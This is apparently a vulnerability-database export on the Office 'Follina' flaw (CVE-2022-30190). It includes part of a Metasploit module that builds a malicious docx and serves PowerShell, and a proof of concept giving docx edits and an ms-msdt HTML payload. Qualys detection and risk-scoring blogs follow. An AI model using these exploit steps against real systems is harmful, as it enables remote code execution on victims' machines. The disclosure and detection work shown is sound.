\n'Content-Type' => 'text/html; charset=UTF-8' \n} \n \nif request.method.eql? 'HEAD' \nsend_response(cli, '', header_html) \nelsif request.method.eql? 'OPTIONS' \nresponse = create_response(501, 'Unsupported Method') \nresponse['Content-Type'] = 'text/html' \nresponse.body = '' \n \ncli.send_response(response) \nelsif request.raw_uri.to_s.end_with? '.html' \nprint_status('Sending HTML Payload') \n \nsend_response_html(cli, generate_html, header_html) \nelsif request.raw_uri.to_s.end_with? '.ps1' \nprint_status('Sending PowerShell Payload') \n \nsend_response(cli, @payload_data, header_html) \nend \nend \n \ndef pack_docx \n@docx.each do |entry| \nif entry[:data].is_a?(Nokogiri::XML::Document) \nentry[:data] = entry[:data].to_s \nend \nend \n \nMsf::Util::EXE.to_zip(@docx) \nend \n \ndef primer \nprint_status('Generating a malicious docx file') \n \n@proto = (datastore['SSL'] ? 'https' : 'http') \n \ntemplate_path = get_template_path \nunless File.extname(template_path).downcase.end_with?('.docx') \nfail_with(Failure::BadConfig, 'Template is not a docx file!') \nend \n \nprint_status(\"Using template '#{template_path}'\") \n@docx = unpack_docx(template_path) \n \nprint_status('Injecting payload in docx document') \ninject_docx \n \nprint_status(\"Finalizing docx '#{datastore['FILENAME']}'\") \nfile_create(pack_docx) \n \n@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true) \n \nsuper \nend \n \ndef random_int(min, max) \nrand(max - min) + min \nend \n \ndef unpack_docx(template_path) \ndocument = [] \n \nZip::File.open(template_path) do |entries| \nentries.each do |entry| \nif entry.name.downcase.end_with?('.xml', '.rels') \ncontent = Nokogiri::XML(entry.get_input_stream.read) if entry.file? \nelsif entry.file? \ncontent = entry.get_input_stream.read \nend \n \nvprint_status(\"Parsing item from template: #{entry.name}\") \n \ndocument << { fname: entry.name, data: content } \nend \nend \n \ndocument \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167438/word_msdtjs_rce.rb.txt"}, {"lastseen": "2022-05-31T17:41:58", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "packetstorm", "title": "Microsoft Office MSDT Follina Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44444", "CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "PACKETSTORM:167317", "href": "https://packetstormsecurity.com/files/167317/Microsoft-Office-MSDT-Follina-Proof-Of-Concept.html", "sourceData": "`# POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina \n \n> Info : [New Microsoft Office zero-day used in attacks to execute PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/) \n \n## Summary \n \nOn the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research \nTeam, discovered a malicious Office document shared on Virustotal. This document is \nusing an unusual, but known scheme to infect its victims. The scheme was not detected as \nmalicious by some EDR, like Microsoft Defender for Endpoint. This vulnerability could lead to \ncode execution without the need of user interaction, as it does not involve macros, except if the \nProtected View mode is enabled. There is no CVE number attributed yet. \n \n \n## Technical Details \n \nThe vulnerability is being exploited by using the MSProtocol URI scheme to load some code. \nAttackers could embed malicious links inside Microsoft Office documents, templates or emails \nbeginning with ms-msdt: that will be loaded and executed afterward without user interaction \n- except if the Protected View mode is enabled. Nevertheless, converting the document to \nthe RTF format could also bypass the Protected View feature. \n \n## Proof of Concept \n \nMS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme \"ms-msdt:\" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters). \n \nThe result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros). \n \nHere are the steps to build a Proof-of-Concept docx: \n \n1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx. \n \n2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute \n \n``` \nType=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" \n``` \n \nand `Target=\"embeddings/oleObject1.bin\"` by changing the `Target` value and adding attribute `TargetMode`: \n \n``` \nTarget = \"http://<payload_server>/payload.html!\" \nTargetMode = \"External\" \n``` \n \nNote the Id value (probably it is \"rId5\"). \n \n3. Edit `word/document.xml`. Search for the \"<o:OLEObject ..>\" tag (with `r:id=\"rId5\"`) and change the attribute from `Type=\"Embed\"` to `Type=\"Link\"` and add the attribute `UpdateMode=\"OnCall\"`. \n \nNOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444). \n \n4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`: \n \n``` \n<!doctype html> \n<html lang=\"en\"> \n<body> \n<script> \n//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times \nwindow.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \\\"\"; \n</script> \n \n</body> \n</html> \n``` \n \nNote that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason). \n \n## BONUS (0-click RTF version) \n \nIf you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3: \n \n``` \n<o:LinkType>EnhancedMetaFile</o:LinkType> \n<o:LockedField>false</o:LockedField> \n<o:FieldCodes>\\f 0</o:FieldCodes> \n``` \n \nthen it'll work as RTF also (open the resulting docx and save it as RTF). \n \nWith RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. \n \n## Sources : \n \n- https://nao-sec.org/about \n- https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection \n- https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 \n- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167317/msdt-poc.txt"}], "qualysblog": [{"lastseen": "2022-06-16T21:57:00", "description": "_A new remote code execution vulnerability called \u201cFollina\u201d has been found lurking in most Microsoft products. In this blog, we examine a potential attack vector as well as technical details of Follina, and chart the ability to detect this new vulnerability using both Qualys Multi-Vector EDR and Qualys Context XDR.___\n\nOn May 27, 2022, a security researcher [tweeted](<https://twitter.com/nao_sec/status/1530196847679401984>) about a malicious Microsoft Word document with alarmingly low detection rates that he had found on VirusTotal. Only four vendors detected the document back then. Eventually, as other researchers saw the harmful potential of this low-interaction vulnerability, Microsoft acknowledged the threat and assigned [CVE-2022-30190](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) for tracking purposes.\n\nBased on the attribution provided by Microsoft, it was discovered that another user \u2013 \u201ccrazyman\u201d with the Shadow Chaser Group \u2013 had initially reported this vulnerability back in April. This new remote code execution vulnerability has been dubbed _Follina _in reference to the area code of an Italian town. More importantly, although it has been confirmed by Microsoft, as of this writing it has yet to be patched. [Recent reports](<https://twitter.com/threatinsight/status/1532830739208732673>) already mention the targeting of local U.S. and European government personnel and a major [telecommunication provider](<https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/>) in Australia.\n\nThe Follina vulnerability\u2019s footprint is significant as it affects ALL Microsoft Office versions - 2013 and above \u2013 on ALL currently supported Microsoft Windows operating systems \u2013 even the latest: Windows Server 2022! Microsoft Office is the most popular productivity suite on Earth, installed on 1B+ devices worldwide.\n\nWhat makes this new MS Word vulnerability unique is the fact that there are no macros exploited in this attack. Most malicious Word documents leverage the macro feature of the software to deliver their malicious payload. As a result, normal macro-based scanning methods will not work to detect Follina. Like all vulnerabilities that involve social engineering, the bar for exploitation is low. All an attacker needs to do is lure a targeted user to download a Microsoft document or view an HTML file embedded with the malicious code.\n\n## Phases of an Attack Exploiting the Follina Vulnerability****\n\nThis pictogram represents the attack chain of a typical exploit leveraging Follina (fig.1):\n\nFig.1: Follina attack chain\n\nHere are the steps we observed:\n\nStep 1: The attacker sends an email containing a malicious Microsoft Office document (.docx, etc.) to the targeted user. \nStep 2: The user executes this file, which resolves and executes the attacker-controlled external resource from the document.xml.ref file. \nStep 3: Code exploiting the Follina vulnerability is now served to the user. \nStep 4: This code then launches additional commands like downloading Remote Access Trojans, etc.\n\n## Technical Details of Follina: CVE-2022-30190\n\nQualys found the macro-less MS Word document leveraged a novel technique by referencing an external resource, which in turn called a malicious page. This page then called the ms-msdt: URL protocol handler, to execute PowerShell script code. ms-msdt: resources are handled by the Microsoft Support Diagnostic Tool ([MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>)). This legitimate Microsoft tool is a part of Microsoft\u2019s troubleshooting pack. It should be on cybersecurity\u2019s detection radar, since it features prominently in the [LOLBAS project](<https://lolbas-project.github.io/lolbas/Binaries/Msdt/>) \u2013 albeit with different payloads. LOLBAS exists to document every binary, script, and library that can be used for Living Off The Land techniques. Our research found that modern operating systems such as Windows 2016 that do not have msdt.exe by default are nevertheless also vulnerable to Follina.\n\nA Follina attack involves loading an external reference pointing to a malicious URL. That said, even with macros disabled on a system, the \u201cProtected View\u201d feature can be used to execute code under the security context of the user running the MS Office document. Additionally, there are the location.href and window.location.href HTML methods. In a malicious Microsoft Office document, the OLE Object external reference in the document.xml.refs file contains a URL that ends with a \u201c!\u201d. Figure 2 below shows how the code appears:\n\nFig.2: document.xml.refs pointing to external reference\n\nWhen the user clicks on the document, a call is made to the host hxxp://141.98.215.99/color.html external URL resource, which then serves a malicious document containing a malicious ms-msdt: command-invoking PowerShell script code. Figure 3 shows the malicious code hosted:\n\nFig.3: Sample payload showcasing launch of PowerShell via ms-msdt\n\nAs shown in the image above, most samples observed in the wild involve base64 encoded script code. This base64 encoded PowerShell script code (fig.4, in blue) is decoded (in white) to:\n\nFig.4: PowerShell script code, decoded\n\nAnother variant that we observed involved the use of this malicious code (fig.5):\n\nFig.5: Decoded PowerShell script code variant 2\n\n## Qualys Multi-Vector EDR Can Detect Follina****\n\nIn April 2022, Qualys delivered [Multi-Vector EDR 2.0](<https://blog.qualys.com/product-tech/2022/04/04/edr-is-dead-long-live-multi-vector-edr>) which features comprehensive threat detection and enhanced prioritization for security teams to quickly respond to the most critical incidents. [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) then prevents future attacks from emerging threats like Follina by identifying and eliminating vulnerabilities exploited by malware.\n\nRules detecting the kind of Follina attack chain described above are already available in and mapped to [T1203](<https://attack.mitre.org/techniques/T1203/>), according to the MITRE ATT&CK framework. Our updated EDR offering operationalizes MITRE ATT&CK tactics, not just techniques.\n\n### Detection of MSDT.exe with suspicious arguments\n\nFig.6\n\nOne of the first markers of exploitation is msdt.exe executing base64 encoded PowerShell, as shown above (fig.6).\n\n### Associated process tree\n\nFig.7\n\nEvidence of exploitation of this vulnerability is the parent-child relationship between winword.exe executing msdt.exe (fig.7).\n\n## Qualys Context XDR Can Detect Follina****\n\nWe [launched Qualys Context XDR](<https://blog.qualys.com/product-tech/2022/02/08/introducing-qualys-context-xdr-the-difference-between-chaos-clarity>) back in February 2022. Since its introduction, we have continued to add new features to [our cloud service](<https://www.qualys.com/apps/extended-detection-response/>), and one that will soon be available is support for [SYSMON](<https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon>). Context XDR will leverage the process creation, network connection, and file creation logging features from the Windows Event log.\n\nLet's show how we implement the different fields provided by the following three event IDs into a sample rule logic:\n\n 1. Event ID 1: Process creation \nLogs the relationship between msdt.exe and a Microsoft Office executable along with its command line parameters. \n**AND**\n 2. Event ID 3: Network connection \nLogs network activities via msdt.exe \n**OR**\n 3. Event ID 22: DNSEvent (DNS query) \nLogs name resolutions to reach malicious resources\n\nThis easily translates into a Qualys Context XDR rule as follows (fig.8):\n\nFig.8: Partial Qualys Context XDR rule logic\n\nPost-processing of events leads to a screen like the one below (fig.9):\n\nFig.9: Correlation of an exploitation event in Qualys Context XDR\n\nAn alerting event is created by correlating the values of different Sysmon fields. Figure 10 shows these enriched values in additional detail:\n\nFig.10: Excerpt of values correlating Sysmon fields to create alert\n\n## How to Detect Folina Exploitation Attempts (CVE-2022-30190)****\n\nInformation that Microsoft saves as a part of diagnostic logs definitely helps determine if a system was compromised by leveraging the Follina vulnerability (CVE-2022-30190). The [MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) webpage lists the following default locations for looking up diagnostic information post-execution that are controlled via a \u201c/dt\u201d command line parameter:\n\n 1. %LOCALAPPDATA%\\Diagnostics \n 2. %LOCALAPPDATA%\\ElevatedDiagnostics\n\nIn the Qualys Research Team\u2019s test system, the diagnostic data was stored under:\n\n%LOCALAPPDATA%\\Diagnostics\\<9-digit-number>\\<date YYYYMMDD.000>\n\nThese directories contain several files that can help Digital Forensics and Incident Response personnel to determine what file was run. For example, figure 11 is an excerpt from a PCW.debugreport.xml file in one of our test systems that shows the path and the binary that was run:\n\nFig.11: AppName value in PCW.debugreport.xml depicting the command run via Follina\n\nAdditionally, in case the above XML file is tampered with, the ResultReport.xml file also gives us more details as shown below (fig.12):\n\nFig.12: Additional forensics information present in ResultReport.xml\n\n## Conclusion\n\nAbove all, the Qualys Research Team recommends that enterprises take all appropriate steps mentioned by Microsoft to remediate this vulnerability until patches are made available. Security teams may also add custom AppLocker publisher rules to block msdt.exe from executing or apply an Attack Surface Remediation rule to block all Office applications from creating child processes. Additionally, avoid clicking on unsolicited email communications and enable Qualys Multi-Vector EDR and Qualys Context XDR on affected systems.\n\n## Update\n\nAs a part of the current [Patch Tuesday](<https://blog.qualys.com/vulnerabilities-threat-research/2022/06/14/june-2022-patch-tuesday>) release, Microsoft has released [updates remediating](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>) this vulnerability.\n\n## IOCs\n \n \n SHA256\n 3aa16a340aacc5aecbdb902a5f6668f117b62e27966ab41f8a71a1dd1a08f8bd\n 241f00110265b32f0cab95c5503446d0f41d7f78230797acde1280c9865de220\n fe43f3ea0146e107521b6b81c53ee4eb583cce8bad69f39072134f53081738dd\n e3ba1c45f9dd1f432138654b5f19cf89c55e07219b88aa7628334d38bb036433\n 59bb14faf1f5c29fd1c8a4c3b6085a51acda9659b3148ca4eed50c0efc36a6ba\n 4bd8e0e2d27d6d50c6633e20d78d2e7e092cb29e5e47df9a93a29a995f29d57\n b6ebc38ddaeee12c90df4124d5f73eab93f54cf3a906da0a0c824d2d3ec45c33\n e36984c8db0a05b9524fec5293a580f9c403b7ed683e09e4743a30f9d053e0cd\n a841a941f1048189f679f8e457a8f21954e891864144c585a4abc0e6c685c764\n 73ada27d09e0481ed33c9e2dcafe6d2c09607353867674753be3bad33c8a404\n c5a72c4bdb32669c207d5a0dc274f70152c4c989bb23970ca0310d7cd712509\n 215fab217fe7890fc796ffcf9e82b0407c056991b79b2b07fb41b104e19ef1c5\n 3b0858ed47784638f397078930dd7a9b287bdb0f6706d32a7ad7dbbd11d2573c\n db94048b4a606e2e48bdacc07ca1d686e3f26639e822612172cab08e66abfe93\n 3db60df73a92b8b15d7885bdcc1cbcf9c740ce29c654375a5c1ce8c2b31488a1\n 6b06af3d20fd4f35fe62151d45e4344314d26b68d886d80ad6d8a375820247cf\n a3fbfe25541744380cb53a2faca2d7c61f8e9973520e82acb379127a99db867d\n 0751db137f6830f9ce5c88f6757cef35bd15eb12d46b809611f1a141113ee01d\n db6592107ee379494ae9f0130e4834a9faf3a598aa27aa6fd6f342a9806b34df\n 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784\n 64563b42eb7a4569bfbd8e9f04b00d350875a1bb6fe67ddaf1f932d3b0a7dc98 \n\n## MITRE ATT&CK Mapping\n\n**TID**| **Tactic**| **Technique** \n---|---|--- \nT1566.001| Initial Access| Phishing: Spearphishing Attachment \nT1059.001| Execution| Command and Scripting Interpreter: PowerShell \nT1203| Execution| Exploitation for Client Execution \n \n## Contributors\n\n * Arun Pratap Singh, Engineer, Threat Research, Qualys\n * Pawan N, Engineer, Threat Research, Qualys", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T20:52:25", "type": "qualysblog", "title": "Detect the Follina MSDT Vulnerability (CVE-2022-30190) with Qualys Multi-Vector EDR & Context XDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T20:52:25", "id": "QUALYSBLOG:A63B251EBA1A69DBCD57674990704F6C", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-11T22:50:52", "description": "Vulnerability Management is a foundational component of any cybersecurity program for the implementation of appropriate security controls and the management of cyber risk. Earlier this year Qualys introduced the latest iteration of its vulnerability management product [VMDR 2.0 with TruRisk](<https://blog.qualys.com/product-tech/2022/06/06/introducing-qualys-vmdr-2-0>) which focusses on helping organizations understand and manage cyber risk. Qualys TruRisk assesses risk by taking into account multiple factors such as evidence of vulnerability exploitation, asset criticality, its location, and evidence of compensating controls on the asset among many other factors to assess the accurate risk posture for an organization.\n\nIn this blog we do a deep-dive into the vulnerability prioritization algorithm for TruRisk, compare it to existing vulnerability scoring systems, such as Common Vulnerability Scoring System (CVSS) and Exploit Prediction Scoring System (EPSS), to demonstrate why TruRisk is a better method for prioritizing risk than existing methods. This blog is the first of many blogs focused on different aspects of TruRisk, with other aspects covered in later blogs.\n\n### **Key Takeaways**\n\n * Since 2016, every subsequent year has reported more vulnerabilities than the year before (on average 8%-10% more)\n * CVSS based prioritization results in 51% of vulnerabilities marked as high or critical which leads to ineffective, low-value prioritization\n * Less than 3% of vulnerabilities have weaponized exploits or evidence of exploitation in the wild, two attributes posing the highest risk.\n * Exploit Prediction Scoring System (EPSS) is a step in the right direction to predict vulnerability exploitation. However, it still ranks some vulnerabilities that are actively exploited with a lower probability of exploitation\n * Qualys TruRisk helps organizations prioritize risk by focusing on exploitability, evidence of exploitability, and likelihood of exploitability resulting in up to 85% fewer vulnerabilities to prioritize compared to CVSS.\n\nQualys TruRisk brings asset context, threat context and vulnerability intelligence data under one platform empowering IT and security teams to make better, informed prioritization decisions.\n\nBut first let\u2019s talk about few key challenges.\n\n### Vulnerabilities Are on the Rise\n\nEvery year since 2016, (see Fig. 1) the number of the vulnerabilities reported by NIST has been greater than the year before. According to the [National Vulnerability Database](<https://nvd.nist.gov/vuln/search/statistics?form_type=Basic&results_type=statistics&search_type=all&isCpeNameSearch=false>) (NVD) the number of vulnerabilities reported in 2022 (18,841) has already surpassed the vulnerabilities reported in 2020. And we still have three months to go.\n\nFigure 1: Number of Vulnerabilities by Year (Source: NVD)\n\n### **Vulnerability Threat Landscape**\n\nAs the number of vulnerabilities increase, so does the risk to enterprises. But not all vulnerabilities are created equally. Some vulnerabilities pose greater risk to organizations than others. For example, less than 3% of the vulnerabilities have exploit code weaponized. It is crucial to prioritize vulns like these, that are some of the most critical vulnerabilities first. \n\nFigure 2: Vulnerability Threat Landscape\n\nTraditionally, organizations have relied on CVSS scores for prioritization. However, as we will see in the next section, there are limitations in using CVSS as the only vulnerability prioritization method.\n\n### Challenges With CVSS Based Prioritization \n\nThe **Common Vulnerability Scoring System (CVSS) was introduced in the early 2000s to address the need for **a common method to rate the severity of vulnerabilities. Previously, two researchers could rate the same exact vulnerability in different ways based on their subjective understanding of the vulnerability. This created confusion for security practitioners because they could not accurately determine the actual severity of vulnerabilities. The CVSS system was developed to address this issue by enabling the uniform _technical_ severity assessment of vulnerabilities.\n\nA key factor to keep in mind is CVSS only calculates the technical severity of the vulnerability, not the risk it poses to an organization. Over time, CVSS has been used as a proxy for determining the risk a vulnerability posed to the organization, leading to unintended consequences. This includes patching cycles spent fixing countless vulnerabilities with a CVSS score of 7.5 or higher, while some medium severity vulnerabilities were deprioritized even if they posed a greater risk.\n\nCVSS scores are categorized into four categories low, medium, high, critical. \n\nCVSS Score| CVSS Severity \n---|--- \n0.1 \u2013 3.9| Low \n4.0 \u2013 6.9| Medium \n7.0 \u2013 8.9| High \n9.0 \u2013 10.0| Critical \n \nFigure 3: CVSS Score distribution grouped by CVSS severity\n\nAs shown in Fig.3, **51% (96,340) of the total vulnerabilities are categorized as Critical or High according to CVSS scores**. However, empirical research shows that not all the vulnerabilities in these CVSS score buckets need equal/high attention. The main issue is that CVSS base scores don\u2019t consider threat information like active exploitation in the wild, likelihood of the exploitation in the wild, activity associated with it in dark web or social media, known exploit categorized by CISA, threat actors associated, etc.\n\nAs shown in Fig. 4, as expected known exploited vulnerabilities (as categorized by [CISA Known Exploited Vulnerabilities (KEV) Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) are concentrated at higher CVSS scores (the red dots indicate CISA KEV vulnerabilities).\n\nHowever, there are a significant number of exploits discovered even for lower CVSS scores. For example, **there are 92 out of 832 (11%) CISA_KEV vulnerabilities that have a CVSS score of less than 7.** This could be an issue when relying only on CVSS scores.\n\nFigure 4: CISA known vulnerabilities distributed across CVSS score.\n\n### **Exploit Prediction Scoring System**\n\nTo address challenges related to lack of threat context in the CVSS scoring system, first.org in recent years introduced [Exploit Prediction Scoring System (EPSS)](<https://www.first.org/epss/>), an open, data-driven effort for estimating the likelihood (probability) that a software vulnerability will be exploited in the wild. This is a step in the right direction. EPSS\u2019s goal is to help network defenders better prioritize vulnerability remediation efforts. The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.\n\nAs evidenced by Figure 5. EPSS helps highlight vulnerabilities with high likelihood of exploitation and correlates well with CISA KEV vulnerabilities.\n\nFigure 5: EPSS Score and CISA Known Vulnerabilities distribution across CVSS score\n\nFigure 6: EPSS Score distribution\n\nThe availability of patches also plays a key role in EPSS scores. If patches are available, the probability of exploitation is ranked lower. Many of the CISA Known Vulnerabilities are scored lower in EPSS if they have patches/fixes available. However when prioritizing what to patch first, we need to consider the whole set, not just the ones with patches. For example, consider the following recent vulnerabilities which have low EPSS scores. If we rely only on EPSS to prioritize them, they will not show up in a priority list of vulnerabilities to be remediated. Several examples of vulnerabilities with low EPSS scores and high TruRisk scores are shown in Figure 5.\n\nCVE| Title| EPSS| TruRisk (QVS) \n---|---|---|--- \nCVE-2021-36942| PetitPotam| 0.26| 95 \nCVE-2021-31207| Proxyshell| 0.02| 95 \nCVE-2021-34523| Proxyshell| 0.16| 100 \nCVE-2022-30190| Follina| 0.69| 100 \nCVE-2016-3351| Microsoft Edge Cumulative Security Update (MS16-105)| 0.24| 95 \n**Critical CVEs with patches available scoring low on EPSS**\n\n### **Qualys Severity Levels**\n\nGiven the challenges with CVSS scores, the Qualys research team introduced [Qualys severity levels](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/knowledgebase/severity_levels.htm>) to assess the severity of Qualys IDs (QIDs). In addition to determining the risk associated with exploitation, Qualys severity levels also focus on potential consequences of vulnerability exploitation from an attacker\u2019s point of view. Each QID severity level is reviewed by the Qualys Research Team, including taking vulnerability chaining, server-side vs client-side vulnerabilities, and information from various threat-intel sources to accurately assess them into consideration.\n\nQualys severity levels are an improvement over CVSS as they helped customers quickly prioritize critical vulnerabilities as can be seen in Fig. 7. \n\nFigure 7: Qualys Severity Level Distribution (Source: Qualys)\n\n### Qualys TruRisk, a Data-Driven Way To Prioritize Risks\n\nAll of the scoring mechanisms presented so far are attempting to answer one key question\n\n_What should defenders focus on first?_\n\nEach model attempts to answer the question in its own way but falls short of its goal. Organizations need a better way to respond quickly and prioritize vulnerabilities based on risk.\n\nTo address these challenges Qualys introduced [Qualys VMDR 2.0 with TruRisk](<https://blog.qualys.com/product-tech/2022/06/06/introducing-qualys-vmdr-2-0>) earlier this year to help organizations prioritize vulnerabilities, assets, and groups of assets based on risk. \n\nQualys VMDR with TruRisk is powered by one of the most comprehensive exploit and threat intelligence databases. It spans over 185k CVEs, and 25+ unique threat and exploit intelligence sources such as Metasploit, Canvas, CISA KEV, and even Github, which is increasingly becoming the go-to place to publish exploits.\n\nWith TruRisk, organizations can pinpoint which CVEs are exploited in the wild (even those that don't have a QID) and which malware, ransomware, or threat actor groups are exploiting them. These insights can then be used to prioritize vulnerabilities based on risk.\n\nLet\u2019s take a closer look into how the TruRisk algorithm works, and how it compares to CVSS and EPSS.\n\nTo determine risk, Qualys TruRisk vulnerability scores rely on multiple factors to build the most accurate risk profile for a vulnerability.\n\n**Qualys Vulnerability Score (QVS)** is a Qualys-assigned score for a vulnerability based on multiple factors associated with the CVE such as CVSS and external threat indicators like active exploitation, likelihood of vulnerability being exploited in wild, sighting in the darkweb and social web, exploit code maturity, CISA known exploitable and many more. \n \n**Qualys Detection Score (QDS)** is assigned to QIDs by Qualys. QDS has a range from 1 to 100. If multiple CVEs contribute to a QID, the CVE with the highest score is considered for the QDS calculation. \n \n**Asset Risk Score (ARS)** is the overall risk score assigned to the asset based on the following contributing factors such as Asset Criticality Score (ACS), QDS scores for each QID level, Auto-assigned weighting factor (w) for each criticality level of QIDs, number of vulnerabilities on an asset.\n\nHere is the list of inputs that go into the algorithm.\n\n### **CVSS Base Score**\n\nThe CVSS base score serves as one of the key inputs to assess the risk of the vulnerability. CVEs with higher CVSS base scores are rated higher than those with lower scores. But a high CVSS score alone doesn\u2019t result in a high TruRisk risk score. Evidence of exploitation or weaponized exploit code maturity is required for the CVE to fall in the critical range.\n\n### **CISA Known Exploited Vulnerability (KEV)**\n\nVulnerabilities that are catalogued by CISA as known exploited vulnerabilities that are actively being exploited in the wild are included in the algorithm\n\n### **Real-Time Threat Indicators (RTIs)**\n\nThe TruRisk algorithm considers the type of vulnerability. For example, is it a Denial-of-Service (DoS) vulnerability or a remotely exploitable vulnerability? In the case of remote vulnerability or a web application vulnerability, the risk is rated higher. Other RTI\u2019s such as zero-day, active attacks, high data loss, high lateral movement, etc. that are collected from various threat feeds are also considered by the algorithm.\n\n### **Exploit Code Maturity **\n\nThe TruRisk algorithm analyzes the exploit code maturity for the given vulnerability. The exploit code maturity could be a Proof-of-Concept (PoC) which suggests a theoretical exploit exists. The exploit may already work against systems, or it could be weaponized, in which case the exploit code is considered very mature and can be easily used to compromise a system. The QDS algorithm rates weaponized exploits higher than PoC exploits. \n\n### **Malware **\n\nThe TruRisk algorithm checks to see if the vulnerability is being actively exploited by malware. If it is, then the risk is rated higher.\n\n### **Threat Actors / Ransomware Groups**\n\nThe TruRisk algorithm validates if any threat actors or ransomware groups are actively exploiting the vulnerability. If that is the case, the risk is rated even higher than if it only being exploited by malware. \n\n### **Trending Risk**\n\nThe TruRisk algorithm checks if the vulnerability has been actively exploited in the last 14 days by monitoring the Dark Web, social media, GitHub accounts, and many other similar sources. The risk is further increased if the vulnerability is determined to be trending and exploited in the wild. \n\n### **Applied Mitigation Controls**\n\nThe algorithm correlates the risk from the vulnerability with intelligence related to the asset to assess whether the vulnerability represents a threat to it. For example, the vulnerability may exist on the asset, but the system may have mitigation controls already applied which greatly reduce the risk of exploitation of the vulnerability in the customer\u2019s specific environment. \n\n### **EPSS Score (from First.org)**\n\nQualys TruRisk also leverages [EPSS](<https://www.first.org/epss/model>) scores which predict the probability of a vulnerability being exploited in the next 30 days. 